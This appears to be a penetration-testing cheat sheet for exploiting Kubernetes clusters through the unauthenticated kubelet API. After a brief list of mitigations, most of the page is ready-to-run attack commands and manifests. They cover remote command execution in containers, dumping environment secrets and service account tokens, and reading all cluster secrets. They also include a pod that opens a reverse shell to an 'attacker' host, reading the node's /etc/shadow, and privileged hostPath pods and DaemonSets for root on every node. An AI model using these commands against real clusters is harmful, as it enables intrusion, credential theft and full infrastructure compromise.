Skip to content

Kubelet Exploit

  • Everybody who has access to the kubelet port (10250), even without a certificate, can execute any command inside the container
  • Workaround:
    • The kubelet service should be run with --anonymous-auth=false
    • The service should be segregated at the network level (or force it to listen only localhost --address=127.0.0.1)
    • Force kube-apiserver to use SSH instead of HTTPS (--ssh-keyfile=path/to/id_rsa, --ssh-user=kube)
    • All Service Accounts have the least privileges needed for their tasks

Test Command Execution

List of all pods and containers scheduled

$ curl -sk https://WORKER:10250/pods/ | python -mjson.tool
{
  "kind": "PodList",
  "apiVersion": "v1",
  "metadata": {},
  "items": [
    {
      "metadata": {
        "name": "tiller-797d1b1234-gb6qt",       <-- PODNAME
        "generateName": "tiller-797d1b1234-",
        "namespace": "kube-system",              <-- NAMESPACE
      ...
      "spec": {
        "containers": [
          {
            "name": "tiller",                     <-- CONTAINERNAME
            "image": "x/tiller:2.5.1",
            "ports": [
              {
                "name": "tiller",
                "containerPort": 44134,
                "protocol": "TCP"
              }
            ],
        "serviceAccountName": "tiller",
        "serviceAccount": "tiller",
    ...
    },
    ...
  ]
}

Run command (python)

  • Install kubelet-anon-rce:

    $ git clone https://github.com/serain/kubelet-anon-rce.git
    $ cd kubelet-anon-exec
    $ PIPENV_VENV_IN_PROJECT=true pipenv --python /usr/bin/python3 install --skip-lock
    $ pipenv shell
    

  • Start stream with curl:

    $ curl -Gks https://worker:10250/exec/{namespace}/{podname}/{containername} \
      -d 'input=1' -d 'output=1' -d 'tty=1'                                     \
      -d 'command=ls' -d 'command=/'
    
    $ curl -Gks https://worker:10250/exec/kube-system/tiller-797d1b1234-gb6qt/tiller \
      -d 'input=1' -d 'output=1' -d 'tty=1'                                          \
      -d 'command=ls' -d 'command=/'
    

  • Open with kubelet-anon-rce:

    $ python3 kubelet-anon-rce.py           \
              --node <WORKER>               \
              --namespace <NAMESPACE>       \
              --pod <PODNAME>               \
              --container <CONTAINERNAME>   \
              --exec "ls /"
    
    $ python3 kubelet-anon-rce.py           \
              --node worker                 \
              --namespace kube-system       \
              --pod tiller-797d1b1234-gb6qt \
              --container tiller            \
              --exec "ls /"
    

Run command (wscat)

  • Install wscat:

    $ apt-get update
    $ apt-get install -y npm
    $ ln -s /usr/bin/nodejs /usr/bin/node
    $ npm install -g n n stable
    $ npm install -g wscat
    

  • Start stream with curl:

    $ curl --insecure -v
          -H "X-Stream-Protocol-Version: v2.channel.k8s.io"
          -H "X-Stream-Protocol-Version: channel.k8s.io"
          -X POST "https://WORKER:10250/exec/<namespace>/<podname>/<container-name>?input=1&output=1&tty=1&command=ls"
    
    # That should return a 302 response with a redirect to a stream you can open
    < HTTP/2 302
    < location: /cri/exec/PfWkLulG
    < content-type: text/plain; charset=utf-8
    < content-length: 0
    < date: Tue, 13 Mar 2018 19:21:00 GMT
    

  • Open stream with wscat:

    $ wscat -c "https://kube-node-here:10250/cri/exec/PfWkLulG" --no-check
    

Get access to the API server

Dump secrets from environment variables

$ curl -k -XPOST "https://WORKER:10250/run/<NAMESPACE>/<PODNAME>/<CONTAINERNAME>" -d "cmd=env"
$ curl -k -XPOST "https://WORKER:10250/run/kube-system/node-exporter-iuwg7/node-exporter" -d "cmd=env"

Obtain ServiceAccount Token

The token for the "tiller" Service Account can be retrieved by using the kubelet API /exec endpoint to print it out:

$ python3 kubelet-anon-rce.py           \
          --node <WORKER>               \
          --namespace <NAMESPACE>       \
          --pod <PODNAME>               \
          --container <CONTAINERNAME>   \
          --exec "cat /var/run/secrets/kubernetes.io/serviceaccount/token"

$ python3 kubelet-anon-rce.py           \
          --node worker                 \
          --namespace kube-system       \
          --pod tiller-797d1b1234-gb6qt \
          --container tiller            \
          --exec "cat /var/run/secrets/kubernetes.io/serviceaccount/token"

Or if it's not in default location

  • List processes running on the API server, so to get the path of the token file that Kubernetes uses to authenticate access to the API:

    $ curl -k -XPOST "https://WORKER:10250/run/kube-system/kube-apiserver-kube/kube-apiserver" -d "cmd=ps -ef"
    
    PID   USER     TIME   COMMAND
        1 root       2:29 /usr/local/bin/kube-apiserver --v=4 --insecure-bind-address=127.0.0.1 --etcd-servers=http://127.0.0.1:2379 --admission-control=... --tls-cert-file=/etc/kubernetes/pki/apiserver.pem --tls-private-key-file=/etc/kubernetes/pki/apiserver-key.pem --token-auth-file=/etc/kubernetes/pki/tokens.csv --secure-port=443 --allow-privileged --etcd-servers=http://127.0.0.1:2379
    

  • Cat that file and get the token which is the first field listed:

    $ curl -k -XPOST "https://WORKER:10250/run/kube-system/kube-apiserver-kube/kube-apiserver" -d "cmd=cat /etc/kubernetes/pki/tokens.csv"
    
    #password, user, uid, "group1,group2,group3"
    d65ba5f070e714ab,kubeadm-node-csr,9738242e-8681-11e6-b5b4-000c29d33879,system:kubelet-bootstrap
    

Auth to the API server and access all secrets

  • Using kubectl:

    $ kubectl --insecure-skip-tls-verify=true  \
              --server="https://master:6443"   \
              --token="<TOKEN>"                \
              get secrets --all-namespaces -o json
    

  • Using curl:

    $ curl -ks -H "Authorization: Bearer <TOKEN>" \
      https://master:6443/api/v1/namespaces/{namespace}/secrets
    

Access the nodes

Persist with kubectl

  • Persist with kubectl, by downloading it and pointing it at the cluster:
    $ wget https://storage.googleapis.com/kubernetes-release/release/v1.4.0/bin/linux/amd64/kubectl
    $ chmod +x kubectl
    $ ./kubectl config set-cluster test --server=https://MASTER
    $ ./kubectl config set-credentials cluster-admin --token=<TOKEN>
    

Create deployment to mount a node's filesystem

  • Access to an underlying node's filesystem can be obtained by mounting the node's root directory into a container deployed in a pod
  • The following deployment (node-access.yaml) mounts the host node's filesystem to /host in a container that spawns a reverse shell back to an attacker
    apiVersion: v1
    kind: Pod
    metadata:
      name: test
    spec:
      containers:
        - name: busybox
          image: busybox:1.29.2
          command: ["/bin/sh"]
          args: ["-c", "nc attacker 4444 -e /bin/sh"]
          volumeMounts:
          - name: host
            mountPath: /host
      volumes:
        - name: host
          hostPath:
            # directory location on host
            path: /
          type: Directory
    

Deploy

$ kubectl --insecure-skip-tls-verify=true  \
          --server="https://master:6443"   \
          --token="<TOKEN>"                \
          create -f node-access.yaml

Run commands

  • In addition to the shell, you can also run commands directly on the container
  • We can run a command to cat out the /etc/shadow file of the underlying node:
    $ ./kubectl exec test-pd -c test-container cat /test-pd/shadow
    
  • From there it’s just a bit of password cracking needed and we get shell access to the underlying node

Particular Scheduling

Schedule on Master node

kind: Pod
metadata:
    name: socat
spec:
  tolerations:
      - key: "node-role.kubernetes.io/master"
      effect: NoSchedule
  nodeSelector:
      node-role.kubernetes.io/master: ""
  containers:
      - name: socat
        image: alpine/socat
      args: ["tcp4-listen:80,fork,reuseaddr", "tcp4:169.254.169.254:80"]

Get root on host (random node)

  • YAML to demonstrate the risks of allowing users to create pods on your cluster, without PodSecurityPolicy setup 
  • It creates a privileged container based on the busybox image and sets it in an endless loop, waiting for a connection, whilst also setting up the appropriate security flags to make the pod privileged, and also mounting the root directory of the underlying host into /host
    apiVersion: v1
    kind: Pod
    metadata:
      name: noderootpod
      labels:
    spec:
      hostNetwork: true
      hostPID: true
      hostIPC: true
      containers:
        - name: noderootpod
          image: busybox
          securityContext:
            privileged: true
          volumeMounts:
            - mountPath: /host
              name: noderoot
          command: [ "/bin/sh", "-c", "--" ]
          args: [ "while true; do sleep 30; done;" ]
      volumes:
        - name: noderoot
          hostPath:
            path: /
    
  • Schedule & get shell:
    kubectl create -f noderoot.yml
    kubectl exec -it noderootpod chroot /host
    

Get root on all nodes

  • To get root shells on all the nodes, what you need is a DaemonSet, which will schedule a Pod onto every node in the cluster

    apiVersion: apps/v1
    kind: DaemonSet
    metadata:
      name: noderootpod
      labels:
    spec:
      selector:
        matchLabels:
          name: noderootdaemon
      template:
        metadata:
          labels:
            name: noderootdaemon
        spec:
          tolerations:
          - key: node-role.kubernetes.io/master
            effect: NoSchedule
          hostNetwork: true
          hostPID: true
          hostIPC: true
          containers:
          - name: noderootpod
            image: busybox
            securityContext:
              privileged: true
            volumeMounts:
            - mountPath: /host
              name: noderoot
            command: [ "/bin/sh", "-c", "--" ]
            args: [ "while true; do sleep 30; done;" ]
          volumes:
          - name: noderoot
            hostPath:
              path: /
    

  • Once that's run just do a kubectl get po to see your list of pods to choose from

  • Run the same chroot /host command on one to get that root on the host